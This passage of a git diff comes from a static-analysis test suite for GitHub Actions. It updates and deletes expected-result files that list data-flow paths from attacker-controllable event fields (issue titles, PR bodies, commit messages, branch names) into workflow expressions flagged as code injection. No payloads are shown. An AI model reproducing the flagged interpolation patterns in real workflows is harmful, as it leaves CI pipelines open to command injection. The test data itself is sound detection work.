by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | +| action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected deleted file mode 100644 index 697cf2a310e..00000000000 --- a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected +++ /dev/null 
@@ -1,14 +0,0 @@ -edges -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | -nodes -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | -subpaths -#select -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential critical code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref deleted file mode 100644 index 05ef02c5094..00000000000 --- a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/CriticalCodeInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref deleted file mode 100644 index 1745587e534..00000000000 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/CriticalExpressionInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected deleted file mode 100644 index f852a1b5981..00000000000 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ /dev/null 
@@ -1,276 +0,0 @@ -edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | -| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | -| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | -| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | -| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | -| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | -| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | -| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 
| Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | -| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | -| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | -| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | -| 